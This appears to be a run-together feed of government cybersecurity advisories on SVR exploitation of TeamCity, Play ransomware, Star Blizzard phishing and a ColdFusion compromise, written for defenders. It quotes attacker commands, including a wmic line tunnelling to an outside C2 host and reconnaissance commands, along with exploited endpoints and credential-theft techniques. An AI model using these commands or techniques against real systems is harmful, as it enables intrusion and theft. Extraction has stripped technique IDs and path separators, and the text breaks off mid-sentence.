---|---|---|
Command and Scripting Interpreter: PowerShell |
SVR cyber actors used powershell commands to compress Microsoft SQL server .dll files. |
|
Command and Scripting Interpreter: Windows Command Shell |
SVR cyber actors execute these powershell commands to perform host reconnaissance:
|
|
Exploitation for Client Execution |
SVR cyber actors leverage arbitrary code execution after exploiting CVE-2023-42793. |
|
Hijack Execution Flow: DLL Side-Loading |
SVR cyber actors use a variant of GraphicalProton that uses DLL hijacking in Zabbix as a means to start execution. |
Technique Title | ID | Use |
---|---|---|
Scheduled Task |
SVR cyber actors may abuse Windows Task Schedule to perform task scheduling for initial or recurring execution of malicious code. |
|
Server Software Component: SQL Stored Procedures |
SVR cyber actors abuse SQL server stored procedures to maintain persistence. |
|
Boot or Logon Autostart Execution |
SVR cyber actors used C:Windowssystem32ntoskrnl.exe to configure automatic system boot settings to maintain persistence. |
Technique Title | ID | Use |
---|---|---|
Exploitation for Privilege Escalation |
SVR cyber actors exploit JetBrains TeamCity vulnerability to achieve escalated privileges. To avoid detection, the SVR cyber actors used a “Bring Your Own Vulnerable Driver” technique to disable EDR and AV defense mechanisms. |
|
Account Manipulation |
SVR cyber actors may manipulate accounts to maintain and/or elevate access to victim systems. |
Technique Title | ID | Use |
---|---|---|
Obfuscated Files or Information: Binary Padding |
SVR cyber actors use BMPs to perform binary padding while exchange data is exfiltrated to an their C2 station. |
|
Masquerading |
SVR cyber actors use a variant that uses DLL hijacking in Zabbix as a means to start execution (and potentially provide long-term, hard-to-detect access) and a variant that masks itself within vcperf, an open-source C++ build analysis tool from Microsoft. |
|
Process Injection |
SVR cyber actors inject code into AV and EDR processes to evade defenses. |
|
Disable or Modify Tools |
SVR cyber actors may modify and/or disable tools to avoid possible detection of their malware/tools and activities. |
|
Hide Artifacts |
SVR cyber actors may attempt to hide artifacts associated with their behaviors to evade detection. |
|
Hide Artifacts: Hidden Files and Directories |
When communicating with cloud services, GraphicalProton generates a randomly named directory which is used to store infection-specific BMP files - with both commands and results. |
Technique Title | ID | Use |
---|---|---|
OS Credential Dumping: LSASS Memory |
SVR cyber actors executed Mimikatz commands in memory to gain access to credentials stored in memory. |
|
OS Credential Dumping: Security Account Manager |
SVR cyber actors used:
Mimikatz commands to gain access to credentials. Additionally, SVR cyber actors exfiltrated Windows registry hives to steal credentials.
|
|
Credentials from Password Stores: Credentials from Web Browsers |
In a few specific cases, the SVR used the SharpChromium tool to obtain sensitive browser data such as session cookies, browsing history, or saved logins. |
|
Steal or Forge Kerberos Tickets: Golden Ticket |
To secure long-term access to the environment, the SVR used the Rubeus toolkit to craft Ticket Granting Tickets (TGTs). |
Technique Title | ID | Use |
---|---|---|
System Owner/User Discovery |
SVR cyber actors use these built-in commands to perform host reconnaissance: whoami /priv, whoami / all, whoami / groups, whoami / domain to perform user discovery. |
|
Network Service Discovery | T1046 | SVR cyber actors performed network reconnaissance using a mix of built-in commands and additional tools, such as port scanner and PowerSploit. |
Process Discovery |
SVR cyber actors use GraphicalProton to gather running processes data. |
|
Gather Victim Network Information |
SVR cyber actors use GraphicalProton to gather victim network information. |
Technique Title | ID | Use |
---|---|---|
Exploitation of Remote Services |
SVR cyber actors may exploit remote services to gain unauthorized access to internal systems once inside a network. |
|
Windows Management Instrumentation |
SVR cyber actors executed Rsockstun either in memory or using Windows Management Instrumentation (WMI) to execute malicious commands and payloads. wmic process call create "C:Program FilesWindows Defender Advanced Threat ProtectionSense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31" |
Technique Title | ID | Use |
---|---|---|
Dynamic Resolution |
SVR may dynamically establish connections to command-and-control infrastructure to evade common detections and remediations. |
|
Protocol Tunneling |
SVR cyber actors may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. In selected environments, the SVR used an additional tool named, “rr.exe”—a modified open source reverse socks tunneler named Rsockstunm—to establish a tunnel to the C2 infrastructure. |
Technique Title | ID | Use |
---|---|---|
Automated Exfiltration |
SVR cyber actors may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during collection. |
|
Exfiltration Over C2 Channel |
SVR cyber actors may steal data by exfiltrating it over an existing C2 channel. Stolen data is encoded into normal communications using the same protocol as C2 communications. |
|
Exfiltration Over Web Service |
SVR cyber actors use OneDrive and Dropbox to exfiltrate data to their C2 station. |
Note: Please refer to Appendix B for a list of IOCs.
As a result of this latest SVR cyber activity, the FBI, CISA, NSA, SKW, CERT Polska, and NCSC have identified a few dozen compromised companies in the United States, Europe, Asia, and Australia, and are aware of over a hundred compromised devices though we assess this list does not represent the full set of compromised organizations. Generally, the victim types do not fit into any sort of pattern or trend, aside from having an unpatched, Internet-reachable JetBrains TeamCity server, leading to the assessment that SVR’s exploitation of these victims’ networks was opportunistic in nature and not necessarily a targeted attack. Identified victims included: an energy trade association; companies that provide software for billing, medical devices, customer care, employee monitoring, financial management, marketing, sales, and video games; as well as hosting companies, tools manufacturers, and small and large IT companies.
The following rules can be used to detect activity linked to adversary activity. These rules should serve as examples and adapt to each organization’s environment and telemetry.
|
The following rule detects most known GraphicalProton variants.
|
Note: These rules are meant for threat hunting and have not been tested on a larger dataset.
The FBI, CISA, NSA, SKW, CERT Polska, and NCSC assess the scope and indiscriminate targeting of this campaign poses a threat to public safety and recommend organizations implement the mitigations below to improve organization’s cybersecurity posture. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The information in this report is being provided “as is” for informational purposes only. FBI, CISA, NSA, SKW, CERT Polska, and NCSC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, NSA, SKW, CERT Polska, and NCSC.
December 12, 2023: Initial version.
On a Windows system, the log file C:TeamCitylogsteamcity-server.log
will contain a log message when an attacker modified the internal.properties
file. There will also be a log message for every process created via the /app/rest/debug/processes
endpoint. In addition to showing the command line used, the user ID of the user account whose authentication token was used during the attack is also shown. For example:
[2023-09-26 11:53:46,970] INFO - ntrollers.FileBrowseController - File edited: C:ProgramDataJetBrainsTeamCityconfiginternal.properties by user with id=1
[2023-09-26 11:53:46,970] INFO - s.buildServer.ACTIVITIES.AUDIT - server_file_change: File C:ProgramDataJetBrainsTeamCityconfiginternal.properties was modified by "user with id=1"
[2023-09-26 11:53:58,227] INFO - tbrains.buildServer.ACTIVITIES - External process is launched by user user with id=1. Command line: cmd.exe "/c whoami"
An attacker may attempt to cover their tracks by wiping this log file. It does not appear that TeamCity logs individual HTTP requests, but if TeamCity is configured to sit behind a HTTP proxy, the HTTP proxy may have suitable logs showing the following target endpoints being accessed:
/app/rest/users/id:1/tokens/RPC2
– This endpoint is required to exploit the vulnerability./app/rest/users
– This endpoint is only required if the attacker wishes to create an arbitrary user./app/rest/debug/processes
– This endpoint is only required if the attacker wishes to create an arbitrary process.Note: The user ID value may be higher than 1.
GraphicalProton backdoor:
GraphicalProton HTTPS backdoor:
Backdoored vcperf:
Backdoored Zabbix installation archive:
Backdoored Webroot AV installation archive:
Modified rsockstun
hxxps://matclick[.]com/wp-query[.]php
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Signals Directorate’s Australian Cyber Security Centre (ASD's ACSC) are releasing this joint CSA to disseminate the Play ransomware group’s IOCs and TTPs identified through FBI investigations as recently as October 2023.
Since June 2022, the Play (also known as Playcrypt) ransomware group has impacted a wide range of businesses and critical infrastructure in North America, South America, and Europe. As of October 2023, the FBI was aware of approximately 300 affected entities allegedly exploited by the ransomware actors.
In Australia, the first Play ransomware incident was observed in April 2023, and most recently in November 2023.
The Play ransomware group is presumed to be a closed group, designed to “guarantee the secrecy of deals,” according to a statement on the group’s data leak website. Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data. Ransom notes do not include an initial ransom demand or payment instructions, rather, victims are instructed to contact the threat actors via email.
The FBI, CISA, and ASD’s ACSC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents. This includes requiring multifactor authentication, maintaining offline backups of data, implementing a recovery plan, and keeping all operating systems, software, and firmware up to date.
Download a PDF version of this report:
For a downloadable copy of IOCs, see:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK for Enterprise section for all referenced tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
The Play ransomware group gains initial access to victim networks through the abuse of valid accounts [T1078] and exploitation of public-facing applications [T1190], specifically through known FortiOS (CVE-2018-13379 and CVE-2020-12812) and Microsoft Exchange (ProxyNotShell [CVE-2022-41040 and CVE-2022-41082]) vulnerabilities. Play ransomware actors have been observed to use external-facing services [T1133] such as Remote Desktop Protocol (RDP) and Virtual Private Networks (VPN) for initial access.
Play ransomware actors use tools like AdFind to run Active Directory queries [TA0007] and Grixba [1], an information-stealer, to enumerate network information [T1016] and scan for anti-virus software [T1518.001]. Actors also use tools like GMER, IOBit, and PowerTool to disable anti-virus software [T1562.001] and remove log files [T1070.001]. In some instances, cybersecurity researchers have observed Play ransomware actors using PowerShell scripts to target Microsoft Defender.[2]
Play ransomware actors use command and control (C2) applications, including Cobalt Strike and SystemBC, and tools like PsExec, to assist with lateral movement and file execution. Once established on a network, the ransomware actors search for unsecured credentials [T1552] and use the Mimikatz credential dumper to gain domain administrator access [T1003]. According to open source reporting [2], to further enumerate vulnerabilities, Play ransomware actors use Windows Privilege Escalation Awesome Scripts (WinPEAS) [T1059] to search for additional privilege escalation paths. Actors then distribute executables [T1570] via Group Policy Objects [T1484.001].
Play ransomware actors often split compromised data into segments and use tools like WinRAR to compress files [T1560.001] into .RAR
format for exfiltration. The actors then use WinSCP to transfer data [T1048] from a compromised network to actor-controlled accounts. Following exfiltration, files are encrypted [T1486] with AES-RSA hybrid encryption using intermittent encryption, encrypting every other file portion of 0x100000 bytes. [3] (Note: System files are skipped during the encryption process.) A .play
extension is added to file names and a ransom note titled ReadMe[.]txt
is placed in file directory C:
.
The Play ransomware group uses a double-extortion model [T1657], encrypting systems after exfiltrating data. The ransom note directs victims to contact the Play ransomware group at an email address ending in @gmx[.]de
. Ransom payments are paid in cryptocurrency to wallet addresses provided by Play actors. If a victim refuses to pay the ransom demand, the ransomware actors threaten to publish exfiltrated data to their leak site on the Tor network ([.]onion
URL).
Table 1 lists legitimate tools Play ransomware actors have repurposed for their operations. The legitimate tools listed in this product are all publicly available. Use of these tools and applications should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.
Name | Description |
AdFind |
Used to query and retrieve information from Active Directory. |
Bloodhound |
Used to query and retrieve information from Active Directory. |
GMER |
A software tool intended to be used for detecting and removing rootkits. |
IOBit |
An anti-malware and anti-virus program for the Microsoft Windows operating system. Play actors have accessed IOBit to disable anti-virus software. |
PsExec |
A tool designed to run programs and execute commands on remote systems. |
PowerTool |
A Windows utility designed to improve speed, remove bloatware, protect privacy, and eliminate data collection, among other things. |
PowerShell |
A cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS. |
Cobalt Strike |
A penetration testing tool used by security professionals to test the security of networks and systems. Play ransomware actors have used it to assist with lateral movement and file execution. |
Mimikatz |
Allows users to view and save authentication credentials such as Kerberos tickets. Play ransomware actors have used it to add accounts to domain controllers. |
WinPEAS |
Used to search for additional privilege escalation paths. |
WinRAR |
Used to split compromised data into segments and to compress files into |
WinSCP |
Windows Secure Copy is a free and open-source Secure Shell (SSH) File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Play ransomware actors have used it to transfer data [T1048] from a compromised network to actor-controlled accounts. |
Microsoft Nltest |
Used by Play ransomware actors for network discovery. |
Nekto / PriviCMD |
Used by Play ransomware actors for privilege escalation. |
Process Hacker |
Used to enumerate running processes on a system. |
Plink |
Used to establish persistent SSH tunnels. |
See Table 2 for Play ransomware IOCs obtained from FBI investigations as of October 2023.
Hashes (SHA256) | Description |
453257c3494addafb39cb6815862403e827947a1e7737eb8168cd10522465deb |
Play ransomware custom data gathering tool |
47c7cee3d76106279c4c28ad1de3c833c1ba0a2ec56b0150586c7e8480ccae57 |
Play ransomware encryptor |
75404543de25513b376f097ceb383e8efb9c9b95da8945fd4aa37c7b2f226212 |
SystemBC malware EXE |
7a42f96599df8090cf89d6e3ce4316d24c6c00e499c8557a2e09d61c00c11986 |
SystemBC malware DLL |
7a6df63d883bbccb315986c2cfb76570335abf84fafbefce047d126b32234af8 |
Play ransomware binary |
7dea671be77a2ca5772b86cf8831b02bff0567bce6a3ae023825aa40354f8aca |
SystemBC malware DLL |
c59f3c8d61d940b56436c14bc148c1fe98862921b8f7bad97fbc96b31d71193c |
Play network scanner |
e652051fe47d784f6f85dc00adca1c15a8c7a40f1e5772e6a95281d8bf3d5c74 |
Play ransomware binary |
e8d5ad0bf292c42a9185bb1251c7e763d16614c180071b01da742972999b95da |
Play ransomware binary |
See Table 3–Table 11 for all referenced threat actor tactics and techniques in this advisory.
Technique Title | ID | Use |
---|---|---|
Valid Accounts |
Play ransomware actors obtain and abuse existing account credentials to gain initial access. |
|
Exploit Public Facing Application |
Play ransomware actors exploit vulnerabilities in internet-facing systems to gain access to networks. |
|
External Remote Services |
Play ransomware actors have used remote access services, such as RDP/VPN connection to gain initial access. |
Technique Title | ID | Use |
---|---|---|
System Network Configuration Discovery |
Play ransomware actors use tools like Grixba to identify network configurations and settings. |
|
Software Discovery: Security Software Discovery |
Play ransomware actors scan for anti-virus software. |
Technique Title | ID | Use |
---|---|---|
Impair Defenses: Disable or Modify Tools |
Play ransomware actors use tools like GMER, IOBit, and PowerTool to disable anti-virus software. |
|
Indicator Removal: Clear Windows Event Logs |
Play ransomware actors delete logs or other indicators of compromise to hide intrusion activity. |
Technique Title | ID | Use |
Unsecured Credentials |
Play ransomware actors attempt to identify and exploit credentials stored unsecurely on a compromised network. |
|
OS Credential Dumping |
Play ransomware actors use tools like Mimikatz to dump credentials. |
Technique Title | ID | Use |
---|---|---|
Lateral Tool Transfer |
Play ransomware actors distribute executables within the compromised environment. |
Technique Title | ID | Use |
---|---|---|
Domain Policy Modification: Group Policy Modification |
Play ransomware actors distribute executables via Group Policy Objects. |
Technique Title | ID | Use |
---|---|---|
Archive Collected Data: Archive via Utility |
Play ransomware actors use tools like WinRAR to compress files. |
Technique Title | ID | Use |
---|---|---|
Exfiltration Over Alternative Protocol |
Play ransomware actors use file transfer tools like WinSCP to transfer data. |
Technique Title | ID | Use |
---|---|---|
Data Encrypted for Impact |
Play ransomware actors encrypt data on target systems to interrupt availability to system and network resources. |
|
Financial Theft |
Play ransomware actors use a double-extortion model for financial gain. |
These mitigations apply to all critical infrastructure organizations and network defenders. The FBI, CISA, and ASD’s ACSC recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems), thus, strengthening the security posture for their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
The FBI, CISA, and ASD’s ACSC recommend organizations apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Play ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, the FBI, CISA, and ASD’s ACSC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and ASD’s ACSC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
The FBI, CISA, and ASD’s ACSC recommend continually testing your security program at scale and in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Play ransomware actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
The FBI, CISA, and ASD’s ACSC do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, the FBI’s Internet Crime Complaint Center (IC3), or CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).
Australian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ASD's ACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to cyber.gov.au.
The information in this report is being provided “as is” for informational purposes only. CISA and the FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.
[1] Symantec: Play Ransomware Group Using New Custom Data-Gathering Tools
[2] TrendMicro: Play Ransomware Spotlight
[3] SentinelLabs: Ransomware Developers Turn to Intermittent Encryption to Evade Detection
The Russia-based actor Star Blizzard (formerly known as SEABORGIUM, also known as Callisto Group/TA446/COLDRIVER/TAG-53/BlueCharlie) continues to successfully use spear-phishing attacks against targeted organizations and individuals in the UK, and other geographical areas of interest, for information-gathering activity.
The UK National Cyber Security Centre (NCSC), the US Cybersecurity and Infrastructure Security Agency (CISA), the US Federal Bureau of Investigation (FBI), the US National Security Agency (NSA), the US Cyber National Mission Force (CNMF), the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the Canadian Centre for Cyber Security (CCCS), and the New Zealand National Cyber Security Centre (NCSC-NZ) assess that Star Blizzard is almost certainly subordinate to the Russian Federal Security Service (FSB) Centre 18.
Industry has previously published details of Star Blizzard. This advisory draws on that body of information.
This advisory raises awareness of the spear-phishing techniques Star Blizzard uses to target individuals and organizations. This activity is continuing through 2023.
To download a PDF version of this advisory, see Russian FSB Cyber Actor Star Blizzard Continues Worldwide Spear-phishing Campaigns.
Since 2019, Star Blizzard has targeted sectors including academia, defense, governmental organizations, NGOs, think tanks and politicians.
Targets in the UK and US appear to have been most affected by Star Blizzard activity, however activity has also been observed against targets in other NATO countries, and countries neighboring Russia.
During 2022, Star Blizzard activity appeared to expand further, to include defense-industrial targets, as well as US Department of Energy facilities.
The activity is typical of spear-phishing campaigns, where an actor targets a specific individual or group using information known to be of interest to the targets. In a spear-phishing campaign, an actor perceives their target to have direct access to information of interest, be an access vector to another target, or both.
Using open-source resources to conduct reconnaissance, including social media and professional networking platforms, Star Blizzard identifies hooks to engage their target. They take the time to research their interests and identify their real-world social or professional contacts [T1589], [T1593].
Star Blizzard creates email accounts impersonating known contacts of their targets to help appear legitimate. They also create fake social media or networking profiles that impersonate respected experts [T1585.001] and have used supposed conference or event invitations as lures.
Star Blizzard uses webmail addresses from different providers, including Outlook, Gmail, Yahoo and Proton mail in their initial approach [T1585.002], impersonating known contacts of the target or well-known names in the target’s field of interest or sector.
To appear authentic, the actor also creates malicious domains resembling legitimate organizations [T1583.001].
Microsoft Threat Intelligence Center (MSTIC) provides a list of observed Indicators of Compromise (IOCs) in their SEABORGIUM blog, but this is not exhaustive.
Star Blizzard has predominantly sent spear-phishing emails to targets’ personal email addresses, although they have also used targets’ corporate or business email addresses. The actors may intentionally use personal emails to circumvent security controls in place on corporate networks.
Having taken the time to research their targets’ interests and contacts to create a believable approach, Star Blizzard now starts to build trust. They often begin by establishing benign contact on a topic they hope will engage their targets. There is often some correspondence between attacker and target, sometimes over an extended period, as the attacker builds rapport.
Once trust is established, the attacker uses typical phishing tradecraft and shares a link [T1566.002], apparently to a document or website of interest. This leads the target to an actor-controlled server, prompting the target to enter account credentials.
The malicious link may be a URL in an email message, or the actor may embed a link in a document [T1566.001] on OneDrive, Google Drive, or other file-sharing platforms.
Star Blizzard uses the open-source framework EvilGinx in their spear- phishing activity, which allows them to harvest credentials and session cookies to successfully bypass the use of two-factor authentication [T1539], [T1550.004].
Whichever delivery method is used, once the target clicks on the malicious URL, they are directed to an actor-controlled server that mirrors the sign-in page for a legitimate service. Any credentials entered at this point are now compromised.
Star Blizzard then uses the stolen credentials to log in to a target’s email account [T1078], where they are known to access and steal emails and attachments from the victim’s inbox [T1114.002]. They have also set up mail- forwarding rules, giving them ongoing visibility of victim correspondence [T1114.003].
The actor has also used their access to a victim email account to access mailing-list data and a victim’s contacts list, which they then use for follow- on targeting. They have also used compromised email accounts for further phishing activity [T1586.002].
Spear-phishing is an established technique used by many actors, and Star Blizzard uses it successfully, evolving the technique to maintain their success.
Individuals and organizations from previously targeted sectors should be vigilant of the techniques described in this advisory.
In the UK you can report related suspicious activity to the NCSC.
Information on effective defense against spear-phishing is included in the Mitigations section below.
This report has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.
Tactic |
ID |
Technique |
Procedure |
Reconnaissance |
Search Open Websites/Domains |
Star Blizzard uses open-source research and social media to identify information about victims to use in targeting. |
|
Reconnaissance |
Gather Victim Identity Information |
Star Blizzard uses online data sets and open-source resources to gather information about their targets. |
|
Resource Development |
Establish Accounts: Social Media Accounts |
Star Blizzard has been observed establishing fraudulent profiles on professional networking sites to conduct reconnaissance. |
|
Resource Development |
Establish Accounts: Email Accounts |
Star Blizzard registers consumer email accounts matching the names of individuals they are impersonating to conduct spear-phishing activity. |
|
Resource Development |
Acquire Infrastructure: Domains |
Star Blizzard registers domains to host their phishing framework. |
|
Resource Development |
Compromise Accounts: Email Accounts |
Star Blizzard has been observed using compromised victim email accounts to conduct spear-phishing activity against contacts of the original victim. |
|
Initial Access |
Valid Accounts |
Star Blizzard uses compromised credentials, captured from fake log- in pages, to log in to valid victim user accounts. |
|
Initial Access |
Phishing: Spear-phishing Attachment |
Star Blizzard uses malicious links embedded in email attachments to direct victims to their credential-stealing sites. |
|
Initial Access |
Phishing: Spear-phishing Link |
Star Blizzard sends spear-phishing emails with malicious links directly to credential-stealing sites, or to documents hosted on a file-sharing site, which then direct victims to credential-stealing sites. |
|
Defense Evasion |
Use Alternate Authentication Material: Web Session Cookie |
Star Blizzard bypasses multi-factor authentication on victim email accounts by using session cookies stolen using EvilGinx. |
|
Credential Access |
Steal Web Session Cookie |
Star Blizzard uses EvilGinx to steal the session cookies of victims directed to their fake log-in domains. |
|
Collection |
Email Collection: Remote Email Collection |
Star Blizzard interacts directly with externally facing Exchange services, Office 365 and Google Workspace to access email and steal information using compromised credentials or access tokens. |
|
Collection |
Email Collection: Email Forwarding Rule |
Star Blizzard abuses email- forwarding rules to monitor the activities of a victim, steal information, and maintain persistent access to victim's emails, even after compromised credentials are reset. |
A number of mitigations will be useful in defending against the activity described in this advisory.
This report draws on information derived from NCSC and industry sources. Any NCSC findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times.
This information is exempt under the Freedom of Information Act 2000 (FOIA) and may be exempt under other UK information legislation.
Refer any FOIA queries to ncscinfoleg@ncsc.gov.uk.
All material is UK Crown Copyright©.
]]>The Cybersecurity and Infrastructure Security Agency (CISA) is releasing a Cybersecurity Advisory (CSA) in response to confirmed exploitation of CVE-2023-26360 by unidentified threat actors at a Federal Civilian Executive Branch (FCEB) agency. This vulnerability presents as an improper access control issue impacting Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier). CVE-2023-26360 also affects ColdFusion 2016 and ColdFusion 11 installations; however, they are no longer supported since they reached end of life. Exploitation of this CVE can result in arbitrary code execution. Following the FCEB agency’s investigation, analysis of network logs confirmed the compromise of at least two public-facing servers within the environment between June and July 2023.
This CSA provides network defenders with tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), and methods to detect and protect against similar exploitation.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for tables mapped to the threat actors’ activity.
Adobe ColdFusion is a commercial application server used for rapid web-application development. ColdFusion supports proprietary markup languages for building web applications and integrates external components like databases and other third-party libraries. ColdFusion uses a proprietary language, ColdFusion Markup Language (CFML), for development but the application itself is built using JAVA.
In June 2023, through the exploitation of CVE-2023-26360, threat actors were able to establish an initial foothold on two agency systems in two separate instances. In both incidents, Microsoft Defender for Endpoint (MDE) alerted of the potential exploitation of an Adobe ColdFusion vulnerability on public-facing web servers in the agency’s pre-production environment. Both servers were running outdated versions of software which are vulnerable to various CVEs. Additionally, various commands were initiated by the threat actors on the compromised web servers; the exploited vulnerability allowed the threat actors to drop malware using HTTP POST commands to the directory path associated with ColdFusion.
Analysis suggests that the malicious activity conducted by the threat actors was a reconnaissance effort to map the broader network. No evidence is available to confirm successful data exfiltration or lateral movement during either incident. Note: It is unknown if the same or different threat actors were behind each incident.
As early as June 26, 2023, threat actors obtained an initial foothold on a public-facing [T1190] web server running Adobe ColdFusion v2016.0.0.3 through exploitation of CVE-2023-26360. Threat actors successfully connected from malicious IP address 158.101.73[.]241
. Disclaimer: CISA recommends organizations investigate or vet this IP address prior to taking action, such as blocking. This IP resolves to a public cloud service provider and possibly hosts a large volume of legitimate traffic.
The agency’s correlation of Internet Information Services (IIS) logs against open source[1] information indicates that the identified uniform resource identifier (URI) /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc
was used to exploit CVE-2023-26360. The agency removed the asset from the network within 24 hours of the MDE alert.
Threat actors started process enumeration to obtain currently running processes on the web server and performed a network connectivity check, likely to confirm their connection was successful. Following additional enumeration efforts to obtain information about the web server and its operating system [T1082], the threat actors checked for the presence of ColdFusion version 2018 [T1518]—previous checks were also conducted against version 2016.
Threat actors were observed traversing the filesystem [T1083] and uploading various artifacts to the web server [T1105], to include deleting the file tat.cfm
[T1070.004]. Note: This file was deleted prior to the victim locating it on the host for analysis. Its characteristics and functionality are unknown. In addition:
conf.txt
[T1140] and decoded as a web shell (config.jsp
) [T1505.003],[T1036.008]. Conf.txt
was subsequently deleted, likely to evade detection.config.jsp
web shell from this point on.config.cfm
, an expected configuration file in a standard installation of ColdFusion [T1036.005]. Code review of config.cfm
indicated malicious code—intended to execute on versions of ColdFusion 9 or less—was inserted with the intent to extract username, password, and data source uniform resource locators (URLs). According to analysis, this code insertion could be used in future malicious activity by the threat actors (e.g., by using the valid credentials that were compromised). This file also contained code used to upload additional files by the threat actors; however, the agency was unable to identify the source of their origin.attrib.exe
to hide the newly created config.jsp
web shell [T1564.001]. Analysis of this phase found no indication of successful execution.tat.cfm
, config.jsp
, and system.cfm
failed to execute on the host due to syntax errors.Threat actors created various files (see Table 1 below) in the C:IBM directory using the initialization process coldfusion.exe. None of these files were located on the server (possibly due to threat actor deletion) but are assessed as likely threat actor tools. Analysts assessed the C:IBM directory as a staging folder to support threat actors’ malicious operations.
Disclaimer: Organizations are encouraged to investigate the use of these files for related signs of compromise prior to performing remediation actions. Two artifacts are legitimate Microsoft files; threat actors were observed using these files following initial compromise for intended malicious purposes.
File Name |
Hash (SHA-1) |
Description |
---|---|---|
eee.exe |
b6818d2d5cbd902ce23461f24fc47e24937250e6 |
VirusTotal[3] flags this file as malicious. This was located in D:$RECYCLE.BIN. |
75a8ceded496269e9877c2d55f6ce13551d93ff4 |
The dynamic-link library (DLL) file Note: This file is part of the official Microsoft Edge browser and is a cookie exporter. |
|
fscan.exe |
be332b6e2e2ed9e1e57d8aafa0c00aa77d4b8656 |
Analysis confirmed at least three subnets were scanned using |
RC.exe |
9126b8320d18a52b1315d5ada08e1c380d18806b |
Note: This file is part of the official Windows operating system and is called Microsoft Resource Compiler. |
Note: The malicious code found on the system during this incident contained code that, when executed, would attempt to decrypt passwords for ColdFusion data sources. The seed value included in the code is a known value for ColdFusion version 8 or older—where the seed value was hard-coded. A threat actor who has control over the database server can use the values to decrypt the data source passwords in ColdFusion version 8 or older. The victim’s servers were running a newer version at the time of compromise; thus, the malicious code failed to decrypt passwords using the default hard-coded seed value for the older versions.
As early as June 2, 2023, threat actors obtained an initial foothold on an additional public-facing web server running Adobe ColdFusion v2021.0.0.2 via malicious IP address 125.227.50[.]97
through exploitation of CVE-2023-26360. Threat actors further enumerated domain trusts to identify lateral movement opportunities [T1482] by using nltest
